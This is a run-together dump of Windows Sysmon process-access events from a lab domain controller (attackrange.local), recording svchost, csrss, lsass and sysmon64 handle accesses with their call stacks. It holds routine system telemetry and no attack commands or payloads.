13:58:17.289{59A5CD1D-8E46-6005-0C00-00000000A301}5963772C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010065Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.289{59A5CD1D-8E46-6005-0C00-00000000A301}5963772C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1200-00000000A301}1212C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010064Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:17.289{59A5CD1D-8E46-6005-0C00-00000000A301}5964596C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010063Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.289{59A5CD1D-8E46-6005-0C00-00000000A301}5963772C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010062Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:17.289{59A5CD1D-8E46-6005-0C00-00000000A301}5963772C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010061Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.289{59A5CD1D-8E46-6005-0C00-00000000A301}5963772C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010060Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:17.289{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010059Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.289{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010058Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:17.289{59A5CD1D-8E46-6005-0C00-00000000A301}5963772C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010057Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.289{59A5CD1D-8E46-6005-0C00-00000000A301}5963772C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010056Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:17.289{59A5CD1D-8E46-6005-0C00-00000000A301}5963772C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010055Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.289{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010054Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:17.289{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010053Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.289{59A5CD1D-93F6-6005-E604-00000000A301}48883504C:\Windows\system32\csrss.exe{59A5CD1D-93F9-6005-EE04-00000000A301}4120C:\Windows\system32\efsui.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000010052Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:17.289{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010051Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.289{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010050Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:17.289{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010049Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.289{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010048Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:17.289{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010047Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.289{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010046Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:17.289{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010045Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.289{59A5CD1D-8E46-6005-0C00-00000000A301}5963772C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010044Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:17.289{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+773d|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010043Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.289{59A5CD1D-8E46-6005-0C00-00000000A301}5963772C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010042Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:17.289{59A5CD1D-8E46-6005-0C00-00000000A301}5963772C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010041Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 